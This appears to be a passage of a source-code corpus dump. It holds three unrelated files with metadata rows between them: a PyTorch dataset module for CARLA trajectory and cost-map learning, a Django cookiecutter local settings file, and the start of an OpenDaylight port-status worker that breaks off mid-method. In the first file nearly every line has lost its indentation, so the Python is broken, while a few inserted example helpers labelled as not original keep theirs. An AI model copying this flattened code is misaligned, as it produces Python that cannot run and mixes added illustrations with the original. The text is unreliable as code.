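# made-up numbers chosen only to illustrate the Bezier helper defined above.
def _bezier_usage_example():
    # Fit a smooth curve through three (t, x, y) waypoints, starting with an
    # initial velocity of (1, 0), then sample positions and velocities.
    bezier = Bezier([0.0, 0.5, 1.0], [0.0, 1.0, 2.0], [0.0, 0.5, 0.0],
                    v0=(1.0, 0.0))
    times = np.linspace(bezier.t0, bezier.t0 + bezier.t_span, 20)
    positions = bezier.position(times)    # shape (2, 20)
    velocities = bezier.velocity(times)   # shape (2, 20)
    return positions, velocities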
def angle_normal(angle):
while angle >= np.pi:
angle -= 2*np.pi
while angle <= -np.pi:
angle += 2*np.pi
return angle
def xy2uv(x, y):
pixs_per_meter = 200./25.
u = (200-x*pixs_per_meter).astype(int)
v = (y*pixs_per_meter+400//2).astype(int)
#mask = np.where((u >= 0)&(u < 200))[0]
return u, v
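# Quick illustrative check (not part of the original file) of the image-frame
# conversion above for a made-up point at x = 10 m, y = -5 m: with
# 200 px / 25 m = 8 px per meter, u = 200 - 80 = 120 and v = -40 + 200 = 160.
def _xy2uv_example():
    return xy2uv(np.array([10.0]), np.array([-5.0]))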
class CostMapDataset(Dataset):
def __init__(self, data_index, opt, dataset_path='/media/wang/DATASET/CARLA/town01/', evalmode=False):
self.evalmode = evalmode
self.data_index = data_index
self.weights = []
self.max_dist = opt.max_dist
self.max_t = opt.max_t
self.img_step = opt.img_step
transforms_ = [ transforms.Resize((200, 400), Image.BICUBIC),
transforms.ToTensor(),
transforms.Normalize((0.5), (0.5)),
]
self.transform = transforms.Compose(transforms_)
self.dataset_path = dataset_path
self.pose_dict = {}
self.vel_dict = {}
self.acc_dict = {}
self.files_dict = {}
self.total_len = 0
self.eval_index = None # eval mode
self.eval_cnt = 0 # eval mode
for index in self.data_index:
self.read_pose(index)
self.read_vel(index)
self.read_acc(index)
self.read_img(index)
self.weights.append(len(self.files_dict[index]))
def read_pose(self, index):
file_path = self.dataset_path+str(index)+'/state/pos.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
x = float(sp_line[1])
y = float(sp_line[2])
z = float(sp_line[3])
yaw = float(sp_line[5])
ts_dict[ts] = [x, y, z, yaw]
self.pose_dict[index] = ts_dict
def read_vel(self, index):
file_path = self.dataset_path+str(index)+'/state/vel.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
vx = float(sp_line[1])
vy = float(sp_line[2])
vz = float(sp_line[3])
ts_dict[ts] = [vx, vy, vz]
self.vel_dict[index] = ts_dict
def read_acc(self, index):
file_path = self.dataset_path+str(index)+'/state/acc.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
ax = float(sp_line[1])
ay = float(sp_line[2])
az = float(sp_line[3])
ts_dict[ts] = [ax, ay, az]
self.acc_dict[index] = ts_dict
def read_img(self, index):
files = glob.glob(self.dataset_path+str(index)+'/ipm/*.png')
file_names = []
for file in files:
file_name = file.split('/')[-1][:-4]
file_names.append(file_name)
file_names.sort()
self.files_dict[index] = file_names
def tf_pose(self, data_index, ts, yaw, x_0, y_0):
x_t = self.pose_dict[data_index][ts][0]
y_t = self.pose_dict[data_index][ts][1]
dx = x_t - x_0
dy = y_t - y_0
x = np.cos(yaw)*dx + np.sin(yaw)*dy
y = np.cos(yaw)*dy - np.sin(yaw)*dx
return x, y
def __getitem__(self, index):
while True:
if self.evalmode:
                if self.eval_index is None:
self.eval_index = random.sample(self.data_index,1)[0]
self.cnt = 300
data_index = self.eval_index
file_name = self.files_dict[data_index][self.cnt]
self.cnt += 20
if self.cnt > len(self.files_dict[data_index])-50:
self.eval_index = random.sample(self.data_index,1)[0]
self.cnt = 300
else:
data_index = random.choices(self.data_index, self.weights)[0]
file_name = random.sample(self.files_dict[data_index][300:-120], 1)[0]
ts_index = self.files_dict[data_index].index(file_name)
imgs = []
try:
for i in range(-9,1):
_file_name = self.files_dict[data_index][ts_index + self.img_step*i]
image_path = self.dataset_path + str(data_index)+'/ipm/'+_file_name+'.png'
img = Image.open(image_path).convert('L')
img = self.transform(img)
imgs.append(img)
except:
print('get img error')
continue
imgs = torch.stack(imgs)
x_0 = self.pose_dict[data_index][file_name][0]
y_0 = self.pose_dict[data_index][file_name][1]
yaw = np.deg2rad(self.pose_dict[data_index][file_name][3])
ts_list = []
relative_t_list = []
x_list = []
y_list = []
vx_list = []
vy_list = []
ax_list = []
ay_list = []
a_list = []
collision_flag = False
collision_x = None
collision_y = None
collision_index = None
for i in range(ts_index, len(self.files_dict[data_index])-100):
ts = self.files_dict[data_index][i]
if float(ts)-float(file_name) > self.max_t:
break
else:
x_, y_ = self.tf_pose(data_index, ts, yaw, x_0, y_0)
u, v = xy2uv(x_, y_)
if not collision_flag and u >= 0 and u < 200 and v >=0 and v < 400:
if imgs[-1][0][u][v] < -0.3:
collision_flag = True
collision_x = x_
collision_y = y_
collision_index = i
#break
if collision_flag:
x_list.append(collision_x)
y_list.append(collision_y)
vx = 0.
vy = 0.
a = 0.
a_list.append(0.)
vx_list.append(0.)
vy_list.append(0.)
ax_list.append(0.)
ay_list.append(0.)
ts_list.append(ts)
relative_t_list.append(float(ts)-float(file_name))
else:
x_list.append(x_)
y_list.append(y_)
vx_ = self.vel_dict[data_index][ts][0]
vy_ = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*vx_ + np.sin(yaw)*vy_
vy = np.cos(yaw)*vy_ - np.sin(yaw)*vx_
ax_ = self.acc_dict[data_index][ts][0]
ay_ = self.acc_dict[data_index][ts][1]
ax = ax_*np.cos(yaw) + ay_*np.sin(yaw)
ay = ay_*np.cos(yaw) - ax_*np.sin(yaw)
ax_list.append(ax)
ay_list.append(ay)
theta_a = np.arctan2(ay, ax)
theta_v = np.arctan2(vy, vx)
sign = np.sign(np.cos(theta_a-theta_v))
a = sign*np.sqrt(ax*ax + ay*ay)
a_list.append(a)
vx_list.append(vx)
vy_list.append(vy)
ts_list.append(ts)
relative_t_list.append(float(ts)-float(file_name))
####################
if collision_flag:
a_brake = 10
start_index = collision_index - ts_index
brake_index = 0
for i in range(start_index):
x_i = x_list[start_index-i]
y_i = y_list[start_index-i]
safe_dist = np.sqrt((x_i-collision_x)**2+(y_i-collision_y)**2)
vx_i = vx_list[start_index-i]
vy_i = vy_list[start_index-i]
v2 = vx_i**2+vy_i**2
brake_dist = v2/(2*a_brake)
if brake_dist < safe_dist:
brake_index = start_index - i
break
bz_ts = [float(item) for item in ts_list[brake_index:start_index]]
if len(bz_ts) > 2:
bz_x = [x_list[brake_index], collision_x]
bz_y = [y_list[brake_index], collision_y]
bz_vx = vx_list[brake_index]
bz_vy = vy_list[brake_index]
#print(bz_ts)
bezier = Bezier(bz_ts, bz_x, bz_y, v0=(bz_vx, bz_vy))
sample_number = len(bz_ts)
time_array = np.linspace(bezier.t0, bezier.t0+bezier.t_span, sample_number)
#print(time_array)
position_array = bezier.position(time_array, expand=True)
velocity_array = bezier.velocity(time_array, expand=True)
acc_array = bezier.acc(time_array, expand=True)
new_x = position_array[0,:]
new_y = position_array[1,:]
new_vx = velocity_array[0,:]
new_vy = velocity_array[1,:]
new_ax = acc_array[0,:]
new_ay = acc_array[1,:]
for i in range(start_index-brake_index):
x_list[brake_index+i] = new_x[i]
y_list[brake_index+i] = new_y[i]
vx_list[brake_index+i] = new_vx[i]
vy_list[brake_index+i] = new_vy[i]
ax_list[brake_index+i] = new_ax[i]
ay_list[brake_index+i] = new_ay[i]
a_list[brake_index+i] = -np.sqrt(new_ax[i]**2+new_ay[i]**2)
ts_list[brake_index+i] = str(time_array[i])
relative_t_list[brake_index+i] = time_array[i] - float(file_name)
#relative_t_list.append(float(ts)-float(file_name))
####################
if len(ts_list) == 0:
continue
else:
ts = random.sample(ts_list, 1)[0]
ts_index = ts_list.index(ts)
#weights = [np.exp(-0.23*(float(ts)-float(file_name))) for ts in ts_list]
#sample_ts = random.choices(ts_list, weights)[0]
#print(weights/sum(weights))
break
#ts = sample_ts
# [0 ~ 1]
t = torch.FloatTensor([float(ts)/self.max_t - float(file_name)/self.max_t])
# v0
_vx_0 = self.vel_dict[data_index][file_name][0]
_vy_0 = self.vel_dict[data_index][file_name][1]
v_0 = np.sqrt(_vx_0*_vx_0 + _vy_0*_vy_0)
v_0 = torch.FloatTensor([v_0])
x = x_list[ts_index]
y = y_list[ts_index]
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])# [-1, 1]
# vx, vy
vx = vx_list[ts_index]
vy = vy_list[ts_index]
# ax, ay
ax = ax_list[ts_index]
        ay = ay_list[ts_index]
a = a_list[ts_index]
a = torch.FloatTensor([a])
"""
if collision_flag and float(ts) >= float(collision_t):
ts = collision_t
# x, y
x, y = self.tf_pose(data_index, ts, yaw, x_0, y_0)
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])# [-1, 1]
# vx, vy
vx = 0
vy = 0
# ax, ay
ax = 0
ay = 0
a = 0
a = torch.FloatTensor([a])
else:
# x, y
x, y = self.tf_pose(data_index, ts, yaw, x_0, y_0)
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])# [-1, 1]
# vx, vy
_vx = self.vel_dict[data_index][ts][0]
_vy = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*_vx + np.sin(yaw)*_vy
vy = np.cos(yaw)*_vy - np.sin(yaw)*_vx
# ax, ay
_ax = self.acc_dict[data_index][ts][0]
_ay = self.acc_dict[data_index][ts][1]
ax = _ax*np.cos(yaw) + _ay*np.sin(yaw)
ay = _ay*np.cos(yaw) - _ax*np.sin(yaw)
theta_a = np.arctan2(_ay, _ax)
theta_v = np.arctan2(_vy, _vx)
sign = np.sign(np.cos(theta_a-theta_v))
a = sign*np.sqrt(ax*ax + ay*ay)
a = torch.FloatTensor([a])
"""
vxy = torch.FloatTensor([vx, vy])
axy = torch.FloatTensor([ax, ay])
x_list = torch.FloatTensor(x_list)
y_list = torch.FloatTensor(y_list)
vx_list = torch.FloatTensor(vx_list)
vy_list = torch.FloatTensor(vy_list)
a_list = torch.FloatTensor(a_list)
relative_t_list = torch.FloatTensor(relative_t_list)
if self.evalmode:
return {'img': imgs, 't': t, 'xy':xy, 'vxy':vxy, 'axy':axy, 'a':a, 'v_0':v_0,
'a_list':a_list,
'x_list':x_list, 'y_list':y_list,
'vx_list':vx_list, 'vy_list':vy_list,
'ts_list':relative_t_list}
else:
return {'img': imgs, 't': t, 'xy':xy, 'vxy':vxy, 'axy':axy, 'a':a, 'v_0':v_0}
def __len__(self):
return 100000000000
class CostMapDataset2(CostMapDataset):
def __init__(self, data_index, opt, dataset_path='/media/wang/DATASET/CARLA/town01/', evalmode=False):
self.traj_steps = 8
self.evalmode = evalmode
self.data_index = data_index
self.weights = []
self.max_dist = opt.max_dist
self.max_t = opt.max_t
self.img_step = opt.img_step
transforms_ = [ transforms.Resize((200, 400), Image.BICUBIC),
transforms.ToTensor(),
transforms.Normalize((0.5), (0.5)),
]
self.transform = transforms.Compose(transforms_)
self.dataset_path = dataset_path
self.pose_dict = {}
self.vel_dict = {}
self.acc_dict = {}
self.files_dict = {}
self.total_len = 0
self.eval_index = None # eval mode
self.eval_cnt = 0 # eval mode
for index in self.data_index:
self.read_pose(index)
self.read_vel(index)
self.read_acc(index)
self.read_img(index)
self.weights.append(len(self.files_dict[index]))
def __getitem__(self, index):
while True:
if self.evalmode:
                if self.eval_index is None:
self.eval_index = random.sample(self.data_index,1)[0]
self.cnt = 300
data_index = self.eval_index
file_name = self.files_dict[data_index][self.cnt]
self.cnt += 20
if self.cnt > len(self.files_dict[data_index])-50:
self.eval_index = random.sample(self.data_index,1)[0]
self.cnt = 300
else:
data_index = random.choices(self.data_index, self.weights)[0]
file_name = random.sample(self.files_dict[data_index][300:-120], 1)[0]
ts_index = self.files_dict[data_index].index(file_name)
imgs = []
try:
for i in range(-9,1):
_file_name = self.files_dict[data_index][ts_index + self.img_step*i]
image_path = self.dataset_path + str(data_index)+'/ipm/'+_file_name+'.png'
img = Image.open(image_path).convert('L')
img = self.transform(img)
imgs.append(img)
except:
print('get img error:', image_path)
continue
imgs = torch.stack(imgs)
x_0 = self.pose_dict[data_index][file_name][0]
y_0 = self.pose_dict[data_index][file_name][1]
yaw = np.deg2rad(self.pose_dict[data_index][file_name][3])
ts_list = []
relative_t_list = []
x_list = []
y_list = []
vx_list = []
vy_list = []
a_list = []
for i in range(ts_index, len(self.files_dict[data_index])-100):
ts = self.files_dict[data_index][i]
if float(ts)-float(file_name) > self.max_t:
break
else:
x_, y_ = self.tf_pose(data_index, ts, yaw, x_0, y_0)
x_list.append(x_)
y_list.append(y_)
vx_ = self.vel_dict[data_index][ts][0]
vy_ = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*vx_ + np.sin(yaw)*vy_
vy = np.cos(yaw)*vy_ - np.sin(yaw)*vx_
ax_ = self.acc_dict[data_index][ts][0]
ay_ = self.acc_dict[data_index][ts][1]
ax = ax_*np.cos(yaw) + ay_*np.sin(yaw)
ay = ay_*np.cos(yaw) - ax_*np.sin(yaw)
theta_a = np.arctan2(ay, ax)
theta_v = np.arctan2(vy, vx)
sign = np.sign(np.cos(theta_a-theta_v))
a = sign*np.sqrt(ax*ax + ay*ay)
a_list.append(a)
vx_list.append(vx)
vy_list.append(vy)
ts_list.append(ts)
relative_t_list.append(float(ts)-float(file_name))
if len(ts_list) == 0:
continue
else:
#ts = random.sample(ts_list, 1)[0]
ts_array = random.sample(ts_list, self.traj_steps)
#weights = [np.exp(-0.23*(float(ts)-float(file_name))) for ts in ts_list]
#sample_ts = random.choices(ts_list, weights)[0]
#print(weights/sum(weights))
break
#ts = sample_ts
# [0 ~ 1]
# v0
_vx_0 = self.vel_dict[data_index][file_name][0]
_vy_0 = self.vel_dict[data_index][file_name][1]
v_0 = np.sqrt(_vx_0*_vx_0 + _vy_0*_vy_0)
v_0 = torch.FloatTensor([v_0])
v0_array = [v_0]*self.traj_steps
t_array = []
xy_array = []
vxy_array = []
axy_array = []
a_array = []
for ts in ts_array:
t = torch.FloatTensor([float(ts)/self.max_t - float(file_name)/self.max_t])
t_array.append(t)
# x, y
x, y = self.tf_pose(data_index, ts, yaw, x_0, y_0)
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])# [-1, 1]
xy_array.append(xy)
# yaw_t
#yaw_t = angle_normal(np.deg2rad(self.pose_dict[data_index][ts][3]) - yaw)
#yaw_t = torch.FloatTensor([yaw_t/np.pi])# [-1, 1]
# vx, vy
_vx = self.vel_dict[data_index][ts][0]
_vy = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*_vx + np.sin(yaw)*_vy
vy = np.cos(yaw)*_vy - np.sin(yaw)*_vx
vxy_array.append(torch.FloatTensor([vx, vy]))
# ax, ay
_ax = self.acc_dict[data_index][ts][0]
_ay = self.acc_dict[data_index][ts][1]
ax = _ax*np.cos(yaw) + _ay*np.sin(yaw)
ay = _ay*np.cos(yaw) - _ax*np.sin(yaw)
axy_array.append(torch.FloatTensor([ax, ay]))
theta_a = np.arctan2(_ay, _ax)
theta_v = np.arctan2(_vy, _vx)
sign = np.sign(np.cos(theta_a-theta_v))
a = sign*np.sqrt(ax*ax + ay*ay)
a_array.append(a)
t = torch.FloatTensor(t_array)
v_0 = torch.FloatTensor(v0_array)
xy = torch.stack(xy_array)
vxy = torch.stack(vxy_array)
axy = torch.stack(axy_array)
a = torch.FloatTensor(a_array)
#vxy = torch.FloatTensor([vx, vy])
#axy = torch.FloatTensor([ax, ay])
x_list = torch.FloatTensor(x_list)
y_list = torch.FloatTensor(y_list)
vx_list = torch.FloatTensor(vx_list)
vy_list = torch.FloatTensor(vy_list)
a_list = torch.FloatTensor(a_list)
relative_t_list = torch.FloatTensor(relative_t_list)
if self.evalmode:
return {'img': imgs, 't': t, 'xy':xy, 'vxy':vxy, 'axy':axy, 'a':a, 'v_0':v_0,
'a_list':a_list,
'x_list':x_list, 'y_list':y_list,
'vx_list':vx_list, 'vy_list':vy_list,
'ts_list':relative_t_list}
else:
return {'img': imgs, 't': t, 'xy':xy, 'vxy':vxy, 'axy':axy, 'a':a, 'v_0':v_0}
class CARLADataset(Dataset):
def __init__(self, data_index, dataset_path='/media/wang/DATASET/CARLA/town01/', eval_mode=False):
self.data_index = data_index
self.eval_mode = eval_mode
img_height = 128
img_width = 256
label_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.ToTensor(),
transforms.Normalize((0.5), (0.5))
]
img_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.ColorJitter(brightness=0.2,contrast=0.2,hue=0.2),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
nav_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.RandomRotation(15, resample=Image.BICUBIC, expand=False),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
self.label_transforms = transforms.Compose(label_transforms)
self.img_transforms = transforms.Compose(img_transforms)
self.nav_transforms = transforms.Compose(nav_transforms)
self.dataset_path = dataset_path
self.files_dict = {}
self.total_len = 0
for index in self.data_index:
self.read_img(index)
def read_img(self, index):
files = glob.glob(self.dataset_path+str(index)+'/pm/*.png')
file_names = []
for file in files:
file_name = file.split('/')[-1][:-4]
file_names.append(file_name)
file_names.sort()
self.files_dict[index] = file_names
def __getitem__(self, index):
mirror = False#True if random.random() > 0.5 else False
data_index = random.sample(self.data_index, 1)[0]
while True:
try:
file_name = random.sample(self.files_dict[data_index], 1)[0]
# img
img_path = self.dataset_path + str(data_index)+'/img/'+file_name+'.png'
img = Image.open(img_path).convert("RGB")
# nav
nav_path = self.dataset_path + str(data_index)+'/nav/'+file_name+'.png'
nav = Image.open(nav_path).convert("RGB")
# label
label_path = self.dataset_path + str(data_index)+'/pm/'+file_name+'.png'
label = Image.open(label_path).convert('L')
# mirror the inputs
if mirror:
img = Image.fromarray(np.array(img)[:, ::-1, :], 'RGB')
nav = Image.fromarray(np.array(nav)[:, ::-1, :], 'RGB')
label = Image.fromarray(np.array(label)[:, ::-1], 'L')
img = self.img_transforms(img)
nav = self.nav_transforms(nav)
label = self.label_transforms(label)
break
except:
pass
if not self.eval_mode:
input_img = torch.cat((img, nav), 0)
return {'A': input_img, 'B': label}
else:
return {'A1': img, 'A2': nav, 'B': label, 'file_name':file_name}
def __len__(self):
return 100000000000
class FakeCostMapDataset(Dataset):
def __init__(self, data_index, opt, dataset_path='/media/wang/DATASET/CARLA_HUMAN/town01/', evalmode=False):
self.evalmode = evalmode
self.data_index = data_index
self.max_dist = opt.max_dist
self.max_t = opt.max_t
img_height = 200
img_width = 400
img_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.ColorJitter(brightness=0.2,contrast=0.2,hue=0.2),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
self.transform = transforms.Compose(img_transforms)
nav_transforms = [
transforms.Resize((img_height, img_width), Image.BICUBIC),
transforms.RandomRotation(15, resample=Image.BICUBIC, expand=False),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
self.nav_transforms = transforms.Compose(nav_transforms)
self.dataset_path = dataset_path
self.pose_dict = {}
self.vel_dict = {}
self.files_dict = {}
self.total_len = 0
for index in self.data_index:
self.read_pose(index)
self.read_vel(index)
self.read_img(index)
def read_pose(self, index):
file_path = self.dataset_path+str(index)+'/state/pos.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
x = float(sp_line[1])
y = float(sp_line[2])
z = float(sp_line[3])
yaw = float(sp_line[5])
ts_dict[ts] = [x, y, z, yaw]
self.pose_dict[index] = ts_dict
def read_vel(self, index):
file_path = self.dataset_path+str(index)+'/state/vel.txt'
ts_dict = {}
with open(file_path, 'r') as file:
lines = file.readlines()
for line in lines:
sp_line = line.split()
ts = sp_line[0]
vx = float(sp_line[1])
vy = float(sp_line[2])
vz = float(sp_line[3])
ts_dict[ts] = [vx, vy, vz]
self.vel_dict[index] = ts_dict
def read_img(self, index):
files = glob.glob(self.dataset_path+str(index)+'/ipm/*.png')
file_names = []
for file in files:
file_name = file.split('/')[-1][:-4]
file_names.append(file_name)
file_names.sort()
self.files_dict[index] = file_names
def tf_pose(self, data_index, ts, yaw, x_0, y_0):
x_t = self.pose_dict[data_index][ts][0]
y_t = self.pose_dict[data_index][ts][1]
dx = x_t - x_0
dy = y_t - y_0
x = np.cos(yaw)*dx + np.sin(yaw)*dy
y = np.cos(yaw)*dy - np.sin(yaw)*dx
return x, y
def __getitem__(self, index):
data_index = random.sample(self.data_index, 1)[0]
while True:
file_name = random.sample(self.files_dict[data_index][:-120], 1)[0]
image_path = self.dataset_path + str(data_index)+'/img/'+file_name+'.png'
img = Image.open(image_path).convert("RGB")
img = self.transform(img)
# nav
nav_path = self.dataset_path + str(data_index)+'/nav/'+file_name+'.png'
nav = Image.open(nav_path).convert("RGB")
nav = self.nav_transforms(nav)
input_img = torch.cat((img, nav), 0)
x_0 = self.pose_dict[data_index][file_name][0]
y_0 = self.pose_dict[data_index][file_name][1]
yaw = np.deg2rad(self.pose_dict[data_index][file_name][3])
self.files_dict[data_index].sort()
ts_index = self.files_dict[data_index].index(file_name)
ts_list = []
x_list = []
y_list = []
for i in range(ts_index+1, len(self.files_dict[data_index])-100):
ts = self.files_dict[data_index][i]
_x_t = self.pose_dict[data_index][ts][0]
_y_t = self.pose_dict[data_index][ts][1]
distance = np.sqrt((x_0-_x_t)**2+(y_0-_y_t)**2)
if distance > self.max_dist or (float(ts)-float(file_name) > self.max_t):
break
else:
if distance < 0.03:
pass
else:
x_, y_ = self.tf_pose(data_index, ts, yaw, x_0, y_0)
x_list.append(x_)
y_list.append(y_)
ts_list.append(ts)
if len(ts_list) == 0:
continue
else:
ts = random.sample(ts_list, 1)[0]
break
# [0 ~ 1]
t = torch.FloatTensor([float(ts)/self.max_t - float(file_name)/self.max_t])
_vx_0 = self.vel_dict[data_index][file_name][0]
_vy_0 = self.vel_dict[data_index][file_name][1]
vx_0 = np.cos(yaw)*_vx_0 + np.sin(yaw)*_vy_0
#vy_0 = np.cos(yaw)*_vy_0 - np.sin(yaw)*_vx_0
v_0 = torch.FloatTensor([vx_0])
x, y = self.tf_pose(data_index, ts, yaw, x_0, y_0)
# [-1, 1]
xy = torch.FloatTensor([x/self.max_dist, y/self.max_dist])
yaw_t = angle_normal(np.deg2rad(self.pose_dict[data_index][ts][3]) - yaw)
# [-1, 1]
yaw_t = torch.FloatTensor([yaw_t/np.pi])
_vx = self.vel_dict[data_index][ts][0]
_vy = self.vel_dict[data_index][ts][1]
vx = np.cos(yaw)*_vx + np.sin(yaw)*_vy
vy = np.cos(yaw)*_vy - np.sin(yaw)*_vx
vxy = torch.FloatTensor([vx, vy])
x_list = torch.FloatTensor(x_list)
y_list = torch.FloatTensor(y_list)
if self.evalmode:
return {'img': input_img, 't': t, 'xy':xy, 'vxy':vxy, 'v_0':v_0, 'yaw_t': yaw_t, 'x_list':x_list, 'y_list':y_list}
else:
return {'img': input_img, 't': t, 'xy':xy, 'vxy':vxy, 'v_0':v_0}
def __len__(self):
return 100000000000
if __name__ == '__main__':
import argparse
from datetime import datetime
from PIL import Image, ImageDraw
from torch.utils.data import DataLoader
random.seed(datetime.now())
torch.manual_seed(666)
parser = argparse.ArgumentParser()
parser.add_argument('--dataset_name', type=str, default="mu-log_var-test", help='name of the dataset')
parser.add_argument('--width', type=int, default=400, help='image width')
parser.add_argument('--height', type=int, default=200, help='image height')
parser.add_argument('--scale', type=float, default=25., help='longitudinal length')
parser.add_argument('--batch_size', type=int, default=1, help='size of the batches')
parser.add_argument('--img_step', type=int, default=3, help='RNN input image step')
parser.add_argument('--traj_steps', type=int, default=8, help='traj steps')
parser.add_argument('--max_dist', type=float, default=25., help='max distance')
parser.add_argument('--max_t', type=float, default=3., help='max time')
opt = parser.parse_args()
train_loader = DataLoader(CostMapDataset(data_index=[1,2,3,4,5,6,7,9,10], opt=opt, dataset_path='/media/wang/DATASET/CARLA_HUMAN/town01/', evalmode=True), batch_size=1, shuffle=False)
cnt = 0
for i, batch in enumerate(train_loader):
img = batch['img'][:,-1,:].clone().data.numpy().squeeze()*127+128
img = Image.fromarray(img).convert("RGB")
draw =ImageDraw.Draw(img)
real_x = batch['x_list'].squeeze().data.numpy()
real_y = batch['y_list'].squeeze().data.numpy()
real_u, real_v = xy2uv(real_x, real_y)
for i in range(len(real_u)-1):
draw.line((real_v[i], real_u[i], real_v[i]+1, real_u[i]+1), 'blue')
draw.line((real_v[i], real_u[i], real_v[i]-1, real_u[i]-1), 'blue')
#draw.line((real_v[i]+1, real_u[i], real_v[i+1]+1, real_u[i+1]), 'blue')
#draw.line((real_v[i]-1, real_u[i], real_v[i+1]-1, real_u[i+1]), 'blue')
#if cnt % 10 == 0:
# img.show()
cnt += 1
if cnt > 50:
break
#break
| 40.037363 | 187 | 0.512433 |
17cfa0bbbc59e69720514191fc68640d906b0bb1
| 821 |
py
|
Python
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/settings/local.py
|
uhuramedia/cookiecutter-django
|
8d21b960661aea42bb9e447193321b574b1a1e9f
|
[
"BSD-3-Clause"
] | 2 |
2015-04-17T22:00:02.000Z
|
2015-08-14T03:53:33.000Z
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/settings/local.py
|
uhuramedia/cookiecutter-django
|
8d21b960661aea42bb9e447193321b574b1a1e9f
|
[
"BSD-3-Clause"
] | 38 |
2015-01-13T13:20:49.000Z
|
2017-02-08T13:04:34.000Z
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/settings/local.py
|
uhuramedia/cookiecutter-django
|
8d21b960661aea42bb9e447193321b574b1a1e9f
|
[
"BSD-3-Clause"
] | 8 |
2015-03-31T09:32:38.000Z
|
2018-06-29T02:58:53.000Z
|
# -*- coding: utf-8 -*-
from base import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': '{{cookiecutter.project_name}}',
'HOST': 'localhost',
'USER': 'root',
'PASSWORD': '',
'CONN_MAX_AGE': 600,
}
}
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
}
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
TEMPLATE_CONTEXT_PROCESSORS += ('django.core.context_processors.debug',)
INTERNAL_IPS = ('127.0.0.1',)
INSTALLED_APPS += (
'debug_toolbar',
)
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| 19.547619 | 74 | 0.628502 |
6af6d8c9b85c91ea3df80d2c4cdaac9c10cfc6a4
| 5,530 |
py
|
Python
|
networking_odl/ml2/port_status_update.py
|
gokarslan/networking-odl2
|
6a6967832b2c02dfcff6a9f0ab6e36472b849ce8
|
[
"Apache-2.0"
] | null | null | null |
networking_odl/ml2/port_status_update.py
|
gokarslan/networking-odl2
|
6a6967832b2c02dfcff6a9f0ab6e36472b849ce8
|
[
"Apache-2.0"
] | null | null | null |
networking_odl/ml2/port_status_update.py
|
gokarslan/networking-odl2
|
6a6967832b2c02dfcff6a9f0ab6e36472b849ce8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2017 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from neutron.db import provisioning_blocks
from neutron_lib.callbacks import resources
from neutron_lib import constants as n_const
from neutron_lib import context
from neutron_lib.plugins import directory
from neutron_lib import worker
from oslo_log import log
from networking_odl.common import client as odl_client
from networking_odl.common import odl_features
from networking_odl.common import utils
from networking_odl.common import websocket_client as odl_ws_client
LOG = log.getLogger(__name__)
class OdlPortStatusUpdate(worker.BaseWorker):
"""Class to register and handle port status update"""
PORT_PATH = "restconf/operational/neutron:neutron/ports/port"
def __init__(self):
super(OdlPortStatusUpdate, self).__init__()
self.odl_websocket_client = None
def start(self):
super(OdlPortStatusUpdate, self).start()
LOG.debug('OdlPortStatusUpdate worker running')
if odl_features.has(odl_features.OPERATIONAL_PORT_STATUS):
self.run_websocket()
def stop(self):
if self.odl_websocket_client:
self.odl_websocket_client.set_exit_flag()
def wait(self):
"""Wait for service to complete."""
@staticmethod
def reset():
pass
def run_websocket(self):
# OpenDaylight path to recieve websocket notifications on
neutron_ports_path = "/neutron:neutron/neutron:ports"
self.path_uri = utils.get_odl_url()
self.odl_websocket_client = (
odl_ws_client.OpenDaylightWebsocketClient.odl_create_websocket(
self.path_uri, neutron_ports_path,
odl_ws_client.ODL_OPERATIONAL_DATASTORE,
odl_ws_client.ODL_NOTIFICATION_SCOPE_SUBTREE,
self._process_websocket_recv,
self._process_websocket_reconnect,
True
))
def _process_websocket_recv(self, payload, reconnect):
# Callback for websocket notification
LOG.debug("Websocket notification for port status update")
for event in odl_ws_client.EventDataParser.get_item(payload):
operation, path, data = event.get_fields()
